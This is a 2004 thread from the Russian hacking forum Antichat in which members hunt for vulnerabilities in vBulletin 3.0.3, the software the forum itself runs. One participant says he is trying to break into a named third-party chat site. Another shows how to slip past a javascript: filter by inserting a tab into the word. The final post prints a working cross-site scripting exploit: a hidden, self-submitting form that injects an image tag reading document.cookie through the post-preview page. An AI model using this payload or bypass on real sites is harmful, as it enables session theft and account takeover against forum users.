ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости Vbulletin и здешний форум
  #1  
Старый 02.12.2004, 23:34
Аватар для Монгол
Монгол
Новичок
Регистрация: 02.12.2004
Сообщений: 8
Провел на форуме:
0

Репутация: 0
По умолчанию Уязвимости Vbulletin и здешний форум

Уважаемые Господа,

Этот движек напоминает Vbulletin и скорее всего он и есть... Хорошо хоть версию со страницы убрали ))
Вот одна уязвимость местного движка:

Invalid argument supplied for foreach() in /home/host1220/www/forum/includes/functions.php on line 1815

Короче, предложение такое: расковырять движек Vulletin версии 3.0.3 поскольку, похоже она самая последняя и самая "исправленная"

Я сам пока не смог найти ничего серьезного.... уязвимости last.php и last10.php не в счет, так как не имеют отношение к дистрибутиву (см http://securitytracker.com)


Если у кого есть какие мысли - сюда в форум, или мне на мыло mongol14@yandex.ru<>
 
Ответить с цитированием

  #2  
Старый 02.12.2004, 23:47
Аватар для Access Denied
Access Denied
Новичок
Регистрация: 02.12.2004
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

В качестве опытного эксперимента можно поюзать www.kavkazchat.com
Пытаюсь его сломать, пока не выходит, но это временно
 
Ответить с цитированием

  #3  
Старый 02.12.2004, 23:50
Аватар для Монгол
Монгол
Новичок
Регистрация: 02.12.2004
Сообщений: 8
Провел на форуме:
0

Репутация: 0
По умолчанию

Персонально для Алгола: при использование bb кодов можно попасть во внутрь двойных кавычек.. а вот на javascript: стоит фильтр у тебя опыта больше, может попробуешь ковырнуть bb-коды...Кстати и при использование поля предварительного просмотра сообщения в поле textarea два раза сработал скрипт... повторить мне не удалось..и разобраться почему он сработал тоже.
 
Ответить с цитированием

  #4  
Старый 03.12.2004, 12:48
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Цитата:
Сообщение от Монгол  
Персонально для Алгола: при использование bb кодов можно попасть во внутрь двойных кавычек.. а вот на javascript: стоит фильтр
Да, на джаву стоит фильтр, но это не проблема, обходится вставкой табуляции, типа:
javaSCrip t:
(другие методы обхода см здесь http://antichat.ru/crackchat/HTML )

А в каких BB ты находил дыры?
Я знаю по крайней мере одну уязвимость этого форума в BB. Может есть еще?
 
Ответить с цитированием

  #5  
Старый 03.12.2004, 13:21
Аватар для Монгол
Монгол
Новичок
Регистрация: 02.12.2004
Сообщений: 8
Провел на форуме:
0

Репутация: 0
По умолчанию

Алголу: Дай свою асю. У меня старая куда то девалась. Моя 9151093 По форуму: Здесь и далее "форум" имеется ввиду Vbulletin 3.0.3. Тег [ url] с фильтром на javascript мало того встfвляет http:// перед ссылкой.. Что есть плохо [ img] не проверял. Меня больше интересуют уязвимости Php форума, но пока только faq.php точно имеет уязвимость.
Так же как уже было сказано выше похоже некоррекктно работает предварительный просмотр сообщений, пропуская скрипты и исполняя их. Пару раз у меня прошло. Потом как отрезало, разобраться я так и не смог.
 
Ответить с цитированием

  #6  
Старый 03.12.2004, 13:25
Аватар для Монгол
Монгол
Новичок
Регистрация: 02.12.2004
Сообщений: 8
Провел на форуме:
0

Репутация: 0
По умолчанию

И еще... бл..кие двойные кавычки везде и фильтр на них.. что мне с ними делать не знаю
 
Ответить с цитированием

  #7  
Старый 03.12.2004, 15:27
Аватар для Монгол
Монгол
Новичок
Регистрация: 02.12.2004
Сообщений: 8
Провел на форуме:
0

Репутация: 0
По умолчанию

Ага.. вот это у меня два раза сработало... потом перестало..
Proof of concept:
While a user is previewing the post , both newreply.php and newthread.php
do sanitize the input in 'Preview',but not Edit-panel,malicious code can be
injected thru this flaw.

Exploit:
A page as below can lead visitor to a Preview page which contains XSS code.

-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;
-----------------------------End-----------------------------
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Где почитать про уязвимости в vBulletin Version 3.0.7? CBEKJIA Форумы 2 15.12.2005 22:34
как установить форум vBulletin ? petrovich-lamer PHP, PERL, MySQL, JavaScript 14 10.06.2005 03:39
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Вопрос про уязвимости в Vbulletin version 2.2.7 mynhauzen Форумы 3 04.08.2004 12:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ